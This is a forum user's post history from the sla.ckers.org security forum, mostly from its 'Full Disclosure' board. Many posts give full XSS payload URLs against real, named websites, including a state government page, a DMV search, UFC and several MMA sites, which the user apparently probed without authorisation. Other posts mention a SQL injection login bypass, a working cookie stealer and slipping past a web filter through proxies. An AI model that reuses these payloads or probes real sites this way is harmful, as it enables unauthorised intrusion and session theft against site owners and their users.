Sla.ckers.org

Current Page: 1 of 1
Results 1 - 28 of 28
7 years ago
pheusion
http://www.ct.gov/dps/cwp/eMailPage.asp Several hits, having issue with posting the url though ISEC EDIT: Add the DMV section to the list: http://search.dmv.org/search?w=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29//%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29//%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29//%5C%22%3Balert%28String.fromCharCode%2888%2C83
Forum: Full Disclosure
7 years ago
pheusion
Wow, so much has happened... Been gone for a bit... hope everyone is well Here's one I "stumbled" upon while checking out my 2nd fav site (apart from here of course) http://www.ufc.com/index.cfm?fa=search.results&ss=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2
Forum: Full Disclosure
8 years ago
pheusion
MMA Clothing Co http://www.houseofpainironwear.com/mmanhb.htm search : fromCharCode
Forum: Full Disclosure
8 years ago
pheusion
That Stallowned pic is sweet, I need to learn that vector...
Forum: Full Disclosure
8 years ago
pheusion
http://www.fightingarts.com/reading/get_articles_search.php?word=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%3E%3C%2FSCRIPT%3E--%21%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C
Forum: Full Disclosure
8 years ago
pheusion
http://www.totalvid.com/searchResults.cfm?strSearch=%22%3E%3CSCRIPT%3Ealert%28%27mma_xss%27%29%3B%3C%2FSCRIPT%3E&x=0&y=0 Sorry if I am posting a bunch, just trying to kill this sour mood I am in, doing something fun...
Forum: Full Disclosure
8 years ago
pheusion
http://www.mmauniverse.com/quicksearchsection.html?src=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%3E%3C%2FSCRIPT%3E--%21%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%
Forum: Full Disclosure
8 years ago
pheusion
About.com page for MMA: http://martialarts.about.com/sitesearch.htm?terms="><SCRIPT>alert('MMA_XSS');</SCRIPT>&SUName=martialarts&TopNode=4616&type=1
Forum: Full Disclosure
8 years ago
pheusion
Another MMA site.. http://www.fightresource.com/search.php -- XSS Locator #1 --fromCharCode
Forum: Full Disclosure
8 years ago
pheusion
I gotta get in on the Happy Halloween's... http://cards.halloweenhorrors.net/cgi-bin/search/search.pl?log=halhorror&words=%22%3E%3CSCRIPT%3Ealert%28%22Happy+All+Hallow%27s+Eve%22%29%3C%2Fscript%3E to add to the "spooky" of Halloween, I crashed my car on Fri the 13th.. Weird coincidence... No injuries but pride, so it could've been worse..
Forum: Full Disclosure
8 years ago
pheusion
http://www.pridefc.com/pride2005/index.php?mainpage=fighters_list&action=search&s_name=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%3E%3C%2FSCRIPT%3E--%21%3E%3CSCRIPT%3Ealert%28String.fromCh
Forum: Full Disclosure
8 years ago
pheusion
Hmmm, the link I post in here goes to an error page (Even though when I enter it manually it works) Not an encoding issue but rather the page is using FusionBot.com for search, when I goto it from an external source it fails... Works the search page itself though... The site is: www.brazilianfightwear.com <SCRIPT>alert('VULN');</SCRIPT> Thanks Snake, just saw the BUGS forum ab
Forum: Full Disclosure
8 years ago
pheusion
I found my first MMA site vuln but I need to learn how to post on here...
Forum: Full Disclosure
8 years ago
pheusion
I am in LOVE with FreeSBIE.... I've tried various *BSD's before but there's something about a liveCD that I love...
Forum: OMG Ponies
8 years ago
pheusion
Lol... Sorry
Forum: News and Links
8 years ago
pheusion
Thanks for the info guys...
Forum: SQL and Code Injection
8 years ago
pheusion
NICE Snake... Always good to meet a fellow Tech / BJJ'er.... As you stated, the best way to learn is to build and break it... Getting HTTPD running isn't an issue for me... I just need to read up on building web apps and go the route you suggested...
Forum: News and Links
8 years ago
pheusion
SQL Inj Question: I am just becoming familiar with the ' OR 1=1 type of injections... and have only tested on testing frameworks: IE MightySeek I also have WebGoat installed and ' OR 1=1-- /* is what got me into the admin panel, my question is... Is this really widespread? I have SQL experience (Only since Ora 8i and OSS based RDBMs) and have never heard of anything like this. Granted I'
Forum: SQL and Code Injection
8 years ago
pheusion
Not a fan of beer myself (Bad for Training) So I'm on the same boat... Good liquor... Honestly, I was thinking the UFC (MMA / NHB / BJJ) arena, a lot of Mambo / Joomla sites, usually set up with little tech knowledge, it's an arena I am active in, etc... This place doesn't seem like bashing would become prevalent, all of you with knowledge on the subject are more than willing to give suggestion
Forum: News and Links
8 years ago
pheusion
Wow, Maluc I believe I owe you some beers =) It's this type of info right here, real world type of examples that makes this site so valuable. So many other sites are willing to tell certain things, but not like you guys... I would have been using Google and going through results for ages. Picking an industry is an EXCELLENT suggestion and something I can set a goal with. I can't thank ya
Forum: News and Links
8 years ago
pheusion
HAHA... Still a virgin, learning though!! Thanks to you and everyone else... Is it this exciting for everyone else when they pop their cherry? Time to start finding my own me thinks...
Forum: Full Disclosure
8 years ago
pheusion
I just tried my first on the MPAA search... I got a popup and a whole bunch of code returned... So sweet. You guys are an inspiration...
Forum: Full Disclosure
8 years ago
pheusion
Thanks for the info Maluc... I think maybe that was my issue, finding the sites initially... Doing a google search for various patterns or login file types seemed like it was producing results, but I became weary actually trying to inject based off of the cheatsheet.... It seemed like those would be the hardest hit (As every newb such as myself is following the same learning pattern, I would ima
Forum: News and Links
8 years ago
pheusion
Ok, here's a question... I'm not a coder, I don't have a difficult time in keeping up with simple code, but obviously at the moment I do not have the knowledge to code out a "XSS sandbox" type site myself.... Think Perl and *Nix, that's pretty much my level of coding knowledge... simple admin type stuff (Simple scripts to do this or that) With that being the case, I am sure the righ
Forum: News and Links
8 years ago
pheusion
As always Snake, you remind me of why I love this site so much. The newb questions will come soon, every day I am learning something new and researching, which is honestly, 99% of the fun... Loving the study, makes me feel smart haha Side note: trying to find this post about someone saying they want to kick some A$$.... What's the background about that? I've got a MMA / BJJ school I help
Forum: News and Links
8 years ago
pheusion
I'm guilty of lurking... with gusto!!... Actually, I've just got so much to read and learn I figured I would get a *small* handle on it before I flood ya with questions.... haha I've been reading the cheatsheet and testing on my own sites, I just finished up a cookie stealer from WhiteAcids tut's yesterday.... It works, to a point, I can't get any valid cookies to go through though.... (I had
Forum: News and Links
8 years ago
pheusion
Works through our Websense setup... (Both xlate as well as some ssh tunnels / proxy)

rsnake Wrote:
-------------------------------------------------------
> Hmmm... Without even looking at websense it feels
> like it would be vulnerable to the normal CGI
> proxy stuff (google translator is a perfect
> example). Has anyone tried this:
>
> http://translate.google.com/
Forum: Intro
8 years ago
pheusion
Hello everyone... Came across your site (Via way of Jeremiah's blog) and thought I would join up.... I have been working with *Nix and security administration most of my professional life. Unfortunately being a Sec admin is far from the excitement that the "other" side seems to have, so I am just educating myself on that end and reading as much as possible. Thank you for havi
Forum: Intro